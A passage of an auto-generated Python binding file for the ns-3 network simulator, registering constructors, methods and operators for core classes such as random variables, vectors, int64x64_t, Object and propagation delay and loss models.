cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3UniformVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(ns3::UniformVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UniformVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(double s, double l) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l')])
## random-variable.h (module 'core'): uint32_t ns3::UniformVariable::GetInteger(uint32_t s, uint32_t l) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 's'), param('uint32_t', 'l')])
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue(double s, double l) [member function]
cls.add_method('GetValue',
'double',
[param('double', 's'), param('double', 'l')])
return
def register_Ns3Vector2D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D(double _x, double _y) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector2D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
return
def register_Ns3Vector3D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::z [variable]
cls.add_instance_attribute('z', 'double', is_const=False)
return
def register_Ns3WeibullVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(ns3::WeibullVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::WeibullVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
return
def register_Ns3ZetaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(ns3::ZetaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZetaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(double alpha) [constructor]
cls.add_constructor([param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3ZipfVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(ns3::ZipfVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZipfVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(long int N, double alpha) [constructor]
cls.add_constructor([param('long int', 'N'), param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
def register_Ns3ConstantVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(ns3::ConstantVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConstantVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(double c) [constructor]
cls.add_constructor([param('double', 'c')])
## random-variable.h (module 'core'): void ns3::ConstantVariable::SetConstant(double c) [member function]
cls.add_method('SetConstant',
'void',
[param('double', 'c')])
return
def register_Ns3DeterministicVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(ns3::DeterministicVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeterministicVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(double * d, uint32_t c) [constructor]
cls.add_constructor([param('double *', 'd'), param('uint32_t', 'c')])
return
def register_Ns3EmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable(ns3::EmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): void ns3::EmpiricalVariable::CDF(double v, double c) [member function]
cls.add_method('CDF',
'void',
[param('double', 'v'), param('double', 'c')])
return
def register_Ns3ErlangVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(ns3::ErlangVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ErlangVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(unsigned int k, double lambda) [constructor]
cls.add_constructor([param('unsigned int', 'k'), param('double', 'lambda')])
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue(unsigned int k, double lambda) const [member function]
cls.add_method('GetValue',
'double',
[param('unsigned int', 'k'), param('double', 'lambda')],
is_const=True)
return
def register_Ns3ExponentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(ns3::ExponentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ExponentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'b')])
return
def register_Ns3GammaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(ns3::GammaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GammaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(double alpha, double beta) [constructor]
cls.add_constructor([param('double', 'alpha'), param('double', 'beta')])
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue(double alpha, double beta) const [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha'), param('double', 'beta')],
is_const=True)
return
def register_Ns3IntEmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable(ns3::IntEmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntEmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3LogNormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(ns3::LogNormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::LogNormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(double mu, double sigma) [constructor]
cls.add_constructor([param('double', 'mu'), param('double', 'sigma')])
return
def register_Ns3NormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(ns3::NormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v'), param('double', 'b')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Start() [member function]
cls.add_method('Start',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
def register_Ns3ParetoVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(ns3::ParetoVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ParetoVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params, double b) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params'), param('double', 'b')])
return
def register_Ns3PropagationDelayModel_methods(root_module, cls):
## propagation-delay-model.h (module 'propagation'): ns3::PropagationDelayModel::PropagationDelayModel() [constructor]
cls.add_constructor([])
## propagation-delay-model.h (module 'propagation'): ns3::PropagationDelayModel::PropagationDelayModel(ns3::PropagationDelayModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PropagationDelayModel const &', 'arg0')])
## propagation-delay-model.h (module 'propagation'): ns3::Time ns3::PropagationDelayModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## propagation-delay-model.h (module 'propagation'): static ns3::TypeId ns3::PropagationDelayModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3PropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::PropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel::PropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::PropagationLossModel::SetNext(ns3::Ptr<ns3::PropagationLossModel> next) [member function]
cls.add_method('SetNext',
'void',
[param('ns3::Ptr< ns3::PropagationLossModel >', 'next')])
## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::CalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('CalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RandomPropagationDelayModel_methods(root_module, cls):
## propagation-delay-model.h (module 'propagation'): ns3::RandomPropagationDelayModel::RandomPropagationDelayModel(ns3::RandomPropagationDelayModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomPropagationDelayModel const &', 'arg0')])
## propagation-delay-model.h (module 'propagation'): ns3::RandomPropagationDelayModel::RandomPropagationDelayModel() [constructor]
cls.add_constructor([])
## propagation-delay-model.h (module 'propagation'): ns3::Time ns3::RandomPropagationDelayModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, is_virtual=True)
## propagation-delay-model.h (module 'propagation'): static ns3::TypeId ns3::RandomPropagationDelayModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3RandomPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RandomPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel::RandomPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::RandomPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RangePropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RangePropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel::RangePropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::RangePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
